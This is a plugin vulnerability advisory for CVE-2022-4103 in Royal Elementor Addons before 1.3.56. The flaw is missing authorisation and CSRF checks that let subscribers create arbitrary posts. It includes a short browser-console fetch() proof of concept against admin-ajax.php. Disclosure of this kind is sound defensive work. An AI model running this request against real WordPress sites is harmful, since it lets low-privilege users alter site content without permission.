Royal Elementor Addons < 1.3.56 – Subscriber+ Arbitrary Post Creation | CVE 2022-4103 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks when creating a template, and does not ensure that the post created is a template. This could allow any authenticated users, such as subscriber to create a post (as well as any post type) with an arbitrary title

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as a subscriber

fetch('/wp-admin/admin-ajax.php?action=wpr_create_template', {
       method: 'POST',
       headers: {"Content-Type": "application/x-www-form-urlencoded"},
       body: 'user_template_slug=hello-world&user_template_library=post&user_template_title=Hello 2'
});

Affects Plugins

royal-elementor-addons

Fixed in 1.3.56

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Submitter twitter

https://twitter.com/kazet1234

Verified

Yes

WPVDB ID

5e1244f7-39b5-4f37-8fef-e3f35fc388f1

Timeline

Publicly Published

2022-12-15 (about 1 years ago)

Added

2022-12-14 (about 1 years ago)

Last Updated

2022-12-14 (about 1 years ago)

Other

Published

Title

Published

2023-10-04

Title

Customer Reviews for WooCommerce < 5.36.1 - Missing Authorization

Published

2024-04-16

Title

ProfileGrid – User Profiles, Memberships, Groups and Communities < 5.8.4 - Missing Authorization

Published

2024-05-16

Title

ReviewX – Multi-criteria Rating & Reviews for WooCommerce < 1.6.28 - Missing Authorization

Published

2021-11-08

Title

Tawk.to Live Chat < 0.6.0 - Subscriber+ Visitor Monitoring & Chat Removal

Published

2023-08-17

Title

Simple Org Chart <= 2.3.4 - Unauthenticated Tree Settings Update